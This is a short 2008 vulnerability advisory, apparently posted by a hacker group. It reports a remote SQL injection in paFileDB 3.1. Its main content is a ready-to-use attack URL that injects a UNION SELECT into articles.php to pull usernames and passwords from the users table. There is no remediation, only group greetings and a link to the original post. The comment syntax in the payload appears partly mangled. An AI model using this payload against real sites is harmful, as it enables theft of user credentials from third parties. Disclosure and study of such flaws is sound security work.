paFileDB 3.1 Remote SQL Injection

2008-04-10T00:00:00
ID SECURITYVULNS:DOC:19615
Type securityvulns
Reporter Securityvulns
Modified 2008-04-10T00:00:00

Description

Aria-Security Team (Persian Security Team) http://Aria-Security.com & http://Aria-Security.net


paFileDB 3.1 Remote SQL Injection Greetz: AurA, Kinglet, Null, Mormoroth, Scorp!0n

target/path/articles.php?action=file&id=-9999//union//select//1,username,password,4,5,6,7,8,9//from/*/users/

Original Advisory: http://forum.aria-security.com/showthread.php?p=64

Regards, The-0utl4w